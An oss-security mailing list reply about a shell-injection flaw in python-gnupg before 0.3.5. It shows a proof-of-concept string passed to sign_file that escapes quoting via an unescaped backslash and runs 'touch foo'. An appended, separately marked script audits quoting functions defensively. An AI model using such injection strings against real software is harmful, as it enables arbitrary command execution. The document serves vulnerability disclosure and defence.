Date: Tue, 4 Feb 2014 23:27:34 +1300
From: Matthew Daley <mattd@...fuzz.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request: python-gnupg before 0.3.5 shell injection

On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri@...v.fi> wrote:
> On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:
>> python-gnupg 0.3.5 lists in the changelog:
>> "Added improved shell quoting to guard against shell injection."
>>
>> Sounds like a severe security issue, but further info is lacking.
>
> Diff attached. New function shell_quote() seems to represent major changes to
> shell input quoting against unsafe input.
> [...]

This appears to (at least) miss escaping of backslashes:

$ ls foo
ls: cannot access foo: No such file or directory
$ python
Python 2.7.6 (default, Jan 11 2014, 14:34:26)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import gnupg
>>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
<gnupg.Sign object at 0x7fb3dbfad7d0>
>>>
$ ls foo
foo

- Matthew
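
The message above shows input escaping its quoting through an unescaped backslash. As an added example (not part of the original message and not python-gnupg's own code), this round-trip check compares a hypothetical quoter, `naive_dquote`, which escapes only double quotes, with the standard library's `shlex.quote`. `shlex.split` stands in for the shell's word parsing (an assumption), so nothing is executed.

```python
import shlex


def naive_dquote(s):
    """Hypothetical quoter: wrap in double quotes and escape only '"'.

    Backslashes are passed through untouched, so a backslash placed in
    front of a double quote turns the added escape into a literal
    backslash followed by a closing quote.
    """
    return '"%s"' % s.replace('"', '\\"')


def round_trips(quoter, value):
    """True if quoter(value) parses back to exactly one word equal to value."""
    try:
        return shlex.split(quoter(value)) == [value]
    except ValueError:
        # Unbalanced quote after parsing: the value broke out of its quoting.
        return False


# Constructed sample inputs; the first is the string from the message above.
SAMPLES = [
    "'\\\"; touch foo #'",
    "plain",
    "a b",
    'say "hi"',
    "back\\slash",
    "trailing\\",
]


def audit(quoter):
    """Return the samples that do NOT survive quoting as a single word."""
    return [v for v in SAMPLES if not round_trips(quoter, v)]


if __name__ == "__main__":
    for name, quoter in (("naive_dquote", naive_dquote),
                         ("shlex.quote", shlex.quote)):
        print(name, "fails on:", audit(quoter))
```

A non-empty result from `audit` lists inputs that do not come back as a single word. Passing an argument list to `subprocess` without a shell avoids the quoting problem altogether.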